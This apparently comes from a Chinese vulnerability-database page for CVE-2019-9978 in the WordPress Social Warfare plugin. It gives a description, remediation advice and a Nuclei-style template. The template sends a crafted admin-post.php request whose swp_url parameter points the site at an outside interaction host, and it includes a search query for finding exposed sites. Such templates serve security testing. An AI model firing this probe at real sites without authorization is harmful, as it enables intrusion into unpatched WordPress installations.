CVE-2019-9978: WordPress Social Warfare <3.5.3 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress Social Warfare | POC: 已公开

漏洞描述

WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.

PoC代码[已公开]

id: CVE-2019-9978

info:
  name: WordPress Social Warfare <3.5.3 - Cross-Site Scripting
  author: madrobot,dwisiswant0
  severity: medium
  description: WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.
  remediation: |
    Update the Social Warfare plugin to version 3.5.3 or later to mitigate the vulnerability.
  reference:
    - https://github.com/mpgn/CVE-2019-9978
    - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
    - https://www.pluginvulnerabilities.com/2019/03/21/full-disclosure-of-settings-change-persistent-cross-site-scripting-xss-vulnerability-in-social-warfare/
    - https://www.cybersecurity-help.cz/vdb/SB2019032105
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9978
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-9978
    cwe-id: CWE-79
    epss-score: 0.88097
    epss-percentile: 0.9946
    cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: warfareplugins
    product: social_warfare
    framework: wordpress
    fofa-query: body="social-warfare" && body="wp-"
  tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev,warfareplugins,xss
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Social Warfare'

  - raw:
      - |
        GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022060c37d851571010d76ffc64d9e4380b835abfecfaf05c56966f5c3cbef756c4802210084bdb52d7443f12027fa4ed86a9576fed650e7724d852cb0ee3bbd0580c2b54c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐